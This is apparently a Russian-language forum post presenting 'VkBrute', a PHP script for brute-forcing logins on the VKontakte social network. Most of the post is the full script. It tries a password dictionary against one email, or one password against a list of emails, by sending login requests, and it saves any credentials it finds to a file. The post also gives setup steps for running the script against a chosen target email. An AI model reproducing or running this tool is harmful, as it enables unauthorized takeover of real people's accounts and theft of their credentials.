++++++++++++++++++
VkBrute(vkontakte)
Преимущества
[+] Простота настройки.
[+] Маленький вес.
[+] Работа на сервере
[+] Возможность брута по словарю паролей.
[+] Возможность брута по словарю мыл на один пароль.
В будущем ожидается брут по списку email;pass.
Требования:
Поддержка соккетов сервером.
Если сервер будет ругаться на set_time_limit(0);, то просто закоментируйте строчку.
Скрипт:
<?php #&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| #& VkBrute v. 1.00 #& author Chaak(ICQ:868922) #&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| set_time_limit(0); ######################################################################### $email = 'billygates@microsoft.com'; # Мыло для брута $passw = '1234567'; # Пасс для брута $dict = @file("dictionary.txt"); # Файл со словарем паролей или мыл. $type= 2; # Тип атаки 1-на одно мыло по словарю паролей, 2- на один пароль по словарю мыл. $result = "password.txt"; # Файл с паролем. $user_agent = "Opera/9.50 (Windows NT 6.0; U; ru)";# User-agent ######################################################################### function brute($email,$pass) { $fp=fsockopen("vkontakte.ru",80,$errno,$errstr,10); $out = "GET /login.php?email=".$email."&pass=".$pass." HTTP/1.0\r\n"; $out .= "Host: vkontakte.ru\r\n"; $out .= "User-Agent: $user_agent\r\n"; $out .= "Cookie: income=1\r\n"; $out .= "Content-Type:text/xml; charset=windows-1251\r\n\r\n"; fwrite($fp,$out); $ans=''; while(!feof($fp)) { $ans.=fgets($fp,128); } fclose($fp); if(preg_match("/\b302 Found\b/is", $ans)) return true; else return false; } echo "VkBrute запущен..."; for($i=0;$i<count($dict);$i++){ $dict[$i]=trim($dict[$i]); if($type==1){ if(brute($email,$dict[$i])){ $fp=fopen($result,'ab'); fwrite($fp,$email.':'.$dict[$i]."\n"); fclose($fp); exit(); } }elseif($type==2){ if(brute($dict[$i],$passw)){ $fp=fopen($result,'ab'); fwrite($fp,$dict[$i].':'.$passw."\n"); fclose($fp); } } } ?>Настройка
Положить в файл dictionary.txt словарь с паролями или мылами(при втором способе атаки).
Создать файл password.txt и поставить на него права(chmod) - 777.
В скрипте проставить email, который будите брутить.
Осталось только открыть скрипт в браузере и пойти радоваться жизни(отображаться будет пустая страница).
Если пароль будет найден, он сохранится в файл password.txt
Автор: ChaaK